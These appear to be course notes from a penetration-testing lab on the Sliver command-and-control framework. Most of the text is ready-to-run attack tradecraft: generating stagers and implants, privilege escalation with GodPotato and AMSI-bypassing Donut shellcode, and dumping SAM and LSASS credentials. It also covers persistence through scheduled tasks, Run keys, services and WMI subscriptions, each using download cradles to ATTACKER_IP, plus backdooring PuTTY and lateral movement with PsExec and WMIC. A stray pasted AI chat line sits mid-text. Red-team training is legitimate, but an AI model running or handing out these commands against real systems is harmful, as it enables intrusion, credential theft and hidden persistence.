Sliver is a command and control software developed by BishopFox. Used by penetration testers and red teamers, its client, server, and beacons (known as implants) are written in Golang - making it easy to cross-compile for different platforms.
Sliver has implants, beacons, and stagers (or stager). Implants are the software (binaries/executables) used to preserve an entry onto a target, facilitated by a command and control server. Beaconing is the process of communicating from the target host to the command and control server over a set period. Stagers or a stager are a way of loading a code onto a remote machine. It is mostly used to execute a small piece of code (stager) that loads a different code.
Usage
Sliver C2 Deployment
Stager
Diagram explaining the communication flow between the victim and the attacker’s C2 infrastructure:
sequenceDiagram participant V as Victim Server (IIS) participant 8088 as Attacker:8088<br>(Stager Host / HTTP Server) participant 4443 as Attacker:4443<br>(C2 Listener / TCP) Note over V: Initial Compromise V->>8088: 1. HTTP Request (GET /)<br>Triggered by accessing uploaded sliver.aspx 8088->>V: 2. HTTP Response (Sliver Implant Shellcode) Note over V: Stager executes the downloaded shellcode V->>4443: 3. TCP Handshake & Secure Session<br>Initial Beacon Check-in 4443->>V: 4. C2 Instructions (Tasks/Jobs) loop C2 Communication V->>4443: Beacon Request (Get Tasks) 4443->>V: Task Response (e.g., run whoami) V->>4443: Task Output (Result of whoami) end
- Port 8088 (HTTP): Handles the initial stage download. This is a simple, one-time transaction where the web shell (
sliver.aspx) fetches the actual implant code from the attacker’s server. - Port 4443 (TCP): Manages the persistent C2 channel. After the implant is in memory, it establishes a secure, encrypted TCP session to this port for receiving tasks and sending back results.
# Create Implant Profile
sliver > profiles new --http 10.10.16.13:8088 --format shellcode htb
# Stage Listener Configuration
sliver > stage-listener --url tcp://10.10.16.13:4443 --profile htb
# HTTP Listener
sliver > http -L 10.10.16.13 -l 8088
# Generate Stager (This actually use msfvenom for the job)
sliver > generate stager --lhost 10.10.16.13 --lport 4443 --format csharp --save staged.txtOf course! Here are well-structured markdown notes based on the provided text.
Privilege Escalation with Sliver C2
- The goal is to elevate access from a standard user to a higher-privileged account (e.g.,
SYSTEMorAdministrator). - OPSEC is crucial: Activities must be performed stealthily to avoid triggering security alerts.
Extending Sliver: Aliases & Extensions
Sliver’s functionality can be extended beyond its built-in commands.
| Feature | Description | Key Command |
|---|---|---|
| Alias | A wrapper that sideloads and executes a shared library in memory within a remote process. | sideload |
| Extension | Native code artifacts loaded by the implant to return data to the C2 server. | Similar to aliases. |
| .NET Execution | Runs a .NET binary remotely in a child process. | execute-assembly |
Enumeration Tools
Gathering system information is the first step to identifying privilege escalation vectors.
1. Seatbelt
A C# tool for comprehensive system enumeration.
Installation via Armory:
# Seatbelt is installed via Sliver's Armory
armory install seatbeltExecution in Sliver:
# Using the integrated alias (note the '--')
sliver (HIGH_RISER) > seatbelt -- -group=all
# Using execute-assembly with a local binary
sliver (HIGH_RISER) > execute-assembly /path/to/Seatbelt.exe -group=system- OPSEC Note: The
execute-assemblycommand spawns a sacrificial process (notepad.exeby default). This can be changed with the--processflag.
2. SharpUp
A C# port of PowerUp for privilege escalation vulnerability assessment.
Execution in Sliver:
sliver (HIGH_RISER) > sharpup -- auditExample Output & Analysis:
=== Abusable Token Privileges ===
SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED- The presence of
SeImpersonatePrivilegeis a common privilege escalation vector, especially for service accounts (like an IIS app pool account).
Exploitation: Abusing SeImpersonatePrivilege
GodPotato
An exploit tool that leverages SeImpersonatePrivilege to gain SYSTEM privileges on Windows 11, Server 2022, and older versions.
Basic Usage to Test Privileges:
sliver (HIGH_RISER) > execute-assembly /path/to/GodPotato-NET4.exe -cmd "whoami"
[*] Output:
...
nt authority\systemAdvanced Tradecraft: In-Memory Execution with Donut
Donut generates shellcode from a .NET assembly, allowing it to be executed entirely in memory.
1. Setup Donut
git clone https://github.com/TheWover/donut
cd donut/
make -f Makefile2. Prepare a Beacon
A beacon is required for the payload to call back to.
# Generate an HTTP beacon
sliver (HIGH_RISER) > generate beacon --http YOUR_IP:PORT --skip-symbols -N http-beacon
# Upload the beacon to the target
sliver (HIGH_RISER) > upload http-beacon.exe c:\temp\3. Start the Listener
sliver (HIGH_RISER) > http --lhost YOUR_IP --lport PORT4. Generate Shellcode with Donut
./donut -i /path/to/GodPotato-NET4.exe -a 2 -b 2 -p '-cmd c:\temp\http-beacon.exe' -o godpotato.bin-a 2: Architecture is amd64.-b 2: Bypass AMSI/WLDP/ETW (abort on fail).-p: Arguments to pass to the generated shellcode (the command for GodPotato to run).
5. Create a Sacrificial Process
Spawn a process to host the shellcode, avoiding crashes in critical applications.
sliver (HIGH_RISER) > execute-assembly /path/to/Rubeus.exe createnetonly /program:C:\\windows\\system32\\notepad.exe
[+] ProcessID : 56686. Execute the Shellcode
Inject the Donut shellcode into the sacrificial process.
sliver (HIGH_RISER) > execute-shellcode -p 5668 /path/to/godpotato.bin7. Receive the SYSTEM Beacon
After successful execution, a new beacon callback from the SYSTEM user will be established.
sliver (HIGH_RISER) > beacons
ID Name Transport Remote Address Hostname Username Operating System
========== ============= =========== ====================== ========== ===================== ==================
46d73efb http-beacon http(s) 10.129.205.226:50838 web01 NT AUTHORITY\SYSTEM windows/amd64Beacon vs. Session Management
- Beacons are asynchronous. Commands are queued and executed at the beacon’s check-in interval.
- Use the
taskscommand to monitor the status of executed commands. - To interact with a beacon, use the
usecommand with its ID:sliver (HIGH_RISER) > use 46d sliver (beacon) > - A beacon can be upgraded to an interactive session using the
interactivecommand, which provides real-time command execution.
Privilege Escalation, Credential Access & Persistence
Credential Dumping Techniques
1. SAM Database Extraction (Requires SYSTEM)
# From a SYSTEM-level beacon/session
hashdump
# Example output:
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:e368973bdcf9dd5219882fdf0777ff0b:::
# (NTLM hash: e368973bdcf9dd5219882fdf0777ff0b)2. LSASS Process Memory Dumping
# Find LSASS process ID
ps -e lsass
# Dump LSASS process memory (requires elevated privileges)
procdump --pid <LSASS_PID> --save /tmp/lsass.dmp
# Analyze dump offline with pypykatz
pypykatz lsa minidump /tmp/lsass.dmpOPSEC Considerations:
- LSASS dumping is highly detectable by modern EDR/AV solutions
- Prefer SAM dumping when possible
- Use alternative techniques like SSP or COM object abuse in sensitive environments
3. LSA Secrets Extraction
# Using built-in Sliver capabilities or external tools
# (May require SYSTEM privileges)
reg save HKLM\SECURITY\SECURITY.save
reg save HKLM\SYSTEM\SYSTEM.saveEstablishing Persistence Mechanisms
1. Scheduled Tasks
# Create Base64-encoded PowerShell payload
echo -en "iex(new-object net.webclient).downloadString('http://ATTACKER_IP:8088/stager.txt')" | iconv -t UTF-16LE | base64 -w 0
# Create scheduled task running as SYSTEM
execute powershell 'schtasks /create /sc minute /mo 1 /tn SecurityUpdater /tr "powershell.exe -enc BASE64_PAYLOAD" /ru SYSTEM'2. Startup Folder Persistence
# Using SharPersist to create malicious LNK file
sharpersist -- -t startupfolder -c \"powershell.exe\" -a \"-nop -w hidden iex(new-object net.webclient).downloadstring(\'http://ATTACKER_IP:8088/stager.txt\')\" -f \"Edge Updater\" -m add
# Location: C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3. Registry Run Keys
# Current User Run key (HKCU - no admin needed)
sharpersist -- -t reg -c \"powershell.exe\" -a \"-nop -w hidden iex(new-object net.webclient).downloadstring(\'http://ATTACKER_IP:8088/stager.txt\')\" -k \"hkcurun\" -v \"UserPersistence\" -m add
# Local Machine Run key (HKLM - requires admin)
sharpersist -- -t reg -c \"powershell.exe\" -a \"-nop -w hidden iex(new-object net.webclient).downloadstring(\'http://ATTACKER_IP:8088/stager.txt\')\" -k \"hklmrun\" -v \"SystemPersistence\" -m add4. Service Creation
# Create a new service for persistence
execute sc create PersistentService binPath= "C:\Windows\System32\cmd.exe /c powershell -ep bypass -c iex((new-object net.webclient).downloadstring('http://ATTACKER_IP:8088/stager.txt'))" start= auto
# Start the service
execute sc start PersistentServiceApplication Backdooring
1. Backdooring Legitimate Executables
# Create shellcode profile for persistence
profiles new --format shellcode --http ATTACKER_IP:9002 persistence-shellcode
# Start listener for backdoored applications
http -L ATTACKER_IP -l 9002
# Backdoor target application (e.g., PuTTY)
backdoor --profile persistence-shellcode "C:\Program Files\PuTTY\putty.exe"2. WMI Event Subscription
# Create WMI event subscription for persistence
$FilterArgs = @{
Name = 'PersistenceFilter'
EventNameSpace = 'root\cimv2'
QueryLanguage = 'WQL'
Query = "SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_Process' AND TargetInstance.Name = 'explorer.exe'"
}
$Filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments $FilterArgs
$ConsumerArgs = @{
Name = 'PersistenceConsumer'
CommandLineTemplate = "powershell.exe -nop -w hidden -c iex((new-object net.webclient).downloadstring('http://ATTACKER_IP:8088/stager.txt'))"
}
$Consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments $ConsumerArgs
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{
Filter = $Filter
Consumer = $Consumer
}Pivoting and Tunneling
While following the course Intro to C2 Operations with Sliver, there is a section teaching pivoting using Chisel and ProxyChains, and I really cannot stand both of them. I was seeking for a way to utilize Ligolo-ng, and lucky for me there is a solution: https://github.com/KriyosArcane/sliver-ligolo-ng
There is not much difference from the normal Ligolo-ng itself, just a few extra steps to make Sliver execute the binary from our machine to establish connection on target machine.
git clone https://github.com/KriyosArcane/sliver-ligolo-ng.git
cd sliver-ligolo-ng
makeThe built files will be automatically copied to ~/.sliver-client/aliases/ligolo-ng.
ip tuntap add user $USER mode tun ligolo
ip link set ligolo up
# Start ligolo-ng
lilogo-ng -selfcertIn Sliver session, I’m not sure whether it works for beacon or not:
[server] sliver (http-beacon-9001) > aliases load /root/.sliver-client/aliases/ligolo-ng/alias.json
[*] Ligolo-ng alias has been loaded
[server] sliver (http-beacon-9001) > ligolo-ng -- -connect 10.10.16.13:11601 -ignore-cert
# On ligolo-ng
$ ligolo-ng -selfcert
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
ERRO[0000] Certificate cache error: acme/autocert: certificate cache miss, returning a new certificate
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/
Made in France ♥ by @Nicocha30!
Version: dev
ligolo-ng » INFO[0084] Agent joined. id=785861f3-2674-4683-8ebd-c8a027a6bee1 name="CHILD\\eric@web01" remote="10.129.205.234:49926"
ligolo-ng »
ligolo-ng » session
? Specify a session : 1 - CHILD\eric@web01 - 10.129.205.234:49926 - 785861f3-2674-4683-8ebd-c8a027a6bee1
[Agent : CHILD\eric@web01] » start
[Agent : CHILD\eric@web01] » INFO[0324] Starting tunnel to CHILD\eric@web01 (785861f3-2674-4683-8ebd-c8a027a6bee1)Test with netexec:
$ nxc smb 172.16.1.12 -u svc_sql -p 'jkhnrjk123!'
SMB 172.16.1.12 445 SRV01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:SRV01) (domain:child.htb.local) (signing:False) (SMBv1:False)
SMB 172.16.1.12 445 SRV01 [+] child.htb.local\svc_sql:jkhnrjk123! (admin)Lateral Movement
Using PsExec
To reach the SRV01 machine with the credentials above, we need to create a new logon session using the make-token utility, allowing us to impersonate a user. Other utilities such as impersonate and runas can be used to get an authentication session. This also can be done via a sacrificial process started with the help of Rubeus.
sliver (http-beacon) > make-token -u svc_sql -d child.htb.local -p jkhnrjk123!
[*] Successfully impersonated child.htb.local\svc_sql. Use `rev2self` to revert to your previous token.Having impersonated the svc_sql user, we can test our access to the resources on SRV01 by listing the contents of the C:\ directory.
sliver (http-beacon) > ls //srv01.child.htb.local/c$
\\srv01.child.htb.local\c$\ (12 items, 704.0 MiB)
=================================================
drwxrwxrwx $Recycle.Bin <dir> Wed Sep 14 11:55:41 -0700 2022
Lrw-rw-rw- Documents and Settings -> C:\Users 0 B Tue Sep 13 11:58:35 -0700 2022
-rw-rw-rw- pagefile.sys 704.0 MiB Tue Oct 31 10:51:23 -0700 2023
drwxrwxrwx PerfLogs <dir> Sat Sep 15 00:19:00 -0700 2018
dr-xr-xr-x Program Files <dir> Wed Jul 19 06:40:02 -0700 2023
drwxrwxrwx Program Files (x86) <dir> Wed Sep 14 11:04:07 -0700 2022
drwxrwxrwx ProgramData <dir> Wed Jul 19 06:40:02 -0700 2023
drwxrwxrwx Recovery <dir> Tue Sep 13 11:58:41 -0700 2022
drwxrwxrwx SQL2019 <dir> Wed Sep 14 10:46:10 -0700 2022
drwxrwxrwx System Volume Information <dir> Tue Sep 13 12:19:00 -0700 2022
dr-xr-xr-x Users <dir> Wed Sep 14 11:55:36 -0700 2022
drwxrwxrwx Windows <dir> Sat Oct 15 14:14:52 -0700 2022As seen from the output, we have successfully verified our access using svc_sql’s session (credentials) on SRV01.
Before we run the psexec utility, a pivot listener is needed as it will be used to communicate between SRV01 → WEB01. Simply put, as SRV01 cannot directly communicate to us, SRV01 will communicate to WEB01 from which the chain of communication will be established. The pivots utility supports tcp pivot listener(s) and named-pipe listener(s).
The tcp pivot listener requires a bind address to be specified, which in our case is the IP address of WEB01 (172.16.1.11 internal); by default, every tcp pivot listener will listen on port 9898.
sliver (http-beacon) > pivots tcp --bind 172.16.1.11
[*] Started tcp pivot listener 172.16.1.11:9898 with id 1With the pivot listener started and in place, we need to proceed with creating an implant; the implant, as mentioned, must be in a service format. Again, we will disable symbol obfuscation, and we will use arbitrary names for the service and, respectively, the description; this is done with the intent of blending in. By default, the used name for the service is Sliver and Sliver implant for the description. The pivots command can be used to display the current pivot listeners.
sliver (http-beacon) > generate --format service -i 172.16.1.11:9898 --skip-symbols -N psexec-pivot
[*] Generating new windows/amd64 implant binary
[!] Symbol obfuscation is disabled
[*] Build completed in 3s
[*] Implant saved to /home/htb-ac590/psexec-pivot.exeJumping into the psexec utility, we must specify the path of the implant’s binary.
sliver (http-beacon) > psexec --custom-exe /home/htb-ac590/psexec-pivot.exe --service-name Teams --service-description MicrosoftTeaams srv01.child.htb.local
[*] Uploaded service binary to \\srv01.child.htb.local\C$\windows\temp\51gramfp.exe
[*] Waiting a bit for the file to be analyzed ...
[*] Successfully started service on srv01.child.htb.local (c:\windows\temp\51gramfp.exe)
[*] Successfully removed service Teams on srv01.child.htb.local
[*] Session 23471b15 psexec-pivot - 10.129.205.234:49721->http-beacon-> (srv01) - windows/amd64 - Tue, 31 Oct 2023 11:43:48 GMT
sliver (http-beacon) > sessions
ID Name Transport Remote Address Hostname Username Operating System Locale Last Message Health
========== ============== =========== ===================================== ========== ===================== ================== ======== ======================================= =========
23471b15 psexec-pivot pivot 10.129.205.234:49721->http-beacon-> srv01 NT AUTHORITY\SYSTEM windows/amd64 en-US Tue Oct 31 11:43:48 GMT 2023 (5s ago) [ALIVE]
41e2012e http-beacon http(s) 10.129.205.234:49721 web01 CHILD\eric windows/amd64 en-US Tue Oct 31 11:43:51 GMT 2023 (2s ago) [ALIVE]
sliver (http-beacon) > pivots
ID Protocol Bind Address Number Of Pivots
==== ========== ================== ==================
1 TCP 172.16.1.11:9898 1Using WMIC
WMIC (Windows Management Instrumentation) is a Windows Administration feature that provides a uniform environment for local and remote access to Windows System components. System administrators can create VBScript or PowerShell scripts to manage Windows machines locally and remotely. WMI is also a native way for lateral movement and remote code execution; it requires local administrator privilege.
Proceed to generate an implant through Sliver:
sliver (http-beacon) > generate -i 172.16.1.11:9898 --skip-symbols -N wmicpivot
[*] Generating new windows/amd64 implant binary
[!] Symbol obfuscation is disabled
[*] Build completed in 3s
[*] Implant saved to /home/htb-ac590/wmicpivot.exeRight after having the implant generated, we would proceed by creating a logon session using make-token as explained earlier, and we need to upload the binary on disk on SRV02.
sliver (http-beacon) > make-token -u svc_sql -d child.htb.local -p jkhnrjk123!
[*] Successfully impersonated child.htb.local\svc_sql. Use `rev2self` to revert to your previous token.
sliver (http-beacon) > cd //srv02.child.htb.local/c$/windows/tasks
[*] \\srv02.child.htb.local\c$\windows\tasks
sliver (http-beacon) > upload wmicpivot.exe
[*] Wrote file to \\srv02.child.htb.local\c$\windows\tasks\wmicpivot.exe
sliver (http-beacon) > rev2self
[*] Back to self...We can execute the wmic command to execute an implant on the remote host SRV02 via the beacon/session on WEB01.
wmic /node:172.16.1.13 /user:svc_sql /password:jkhnrjk123! process call create "C:\\windows\tasks\\wmicpivot.exe"The above command can be executed via a PowerShell terminal on WEB01 or through the beacon.
sliver (http-beacon) > execute -o wmic /node:172.16.1.13 /user:svc_sql /password:jkhnrjk123! process call create "C:\\windows\\tasks\\wmicpivot.exe"
[*] Output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 1128;
ReturnValue = 0;
};
[*] Stderr:Having executed the command, it will take advantage of the previous pivot that we have started on port 9898 and will connect back to WEB01.
[*] Session d35ddf7e wmicpivot - 10.129.205.234:49715->http-beacon-> (srv02) - windows/amd64 - Wed, 08 Nov 2023 08:43:20 GMT
sliver (http-beacon) > pivots
ID Protocol Bind Address Number Of Pivots
==== ========== ================== ==================
1 TCP 172.16.1.11:9898 1
sliver (http-beacon) > sessions
ID Name Transport Remote Address Hostname Username Operating System Locale Last Message Health
========== ============= =========== ===================================== ========== =============== ================== ======== ======================================== =========
d35ddf7e wmicpivot pivot 10.129.205.234:49715->http-beacon-> srv02 CHILD\svc_sql windows/amd64 en-US Wed Nov 8 08:43:20 GMT 2023 (15s ago) [ALIVE]
b1ee85c3 http-beacon http(s) 10.129.205.234:49715 web01 CHILD\eric windows/amd64 en-US Wed Nov 8 08:43:33 GMT 2023 (2s ago) [ALIVE]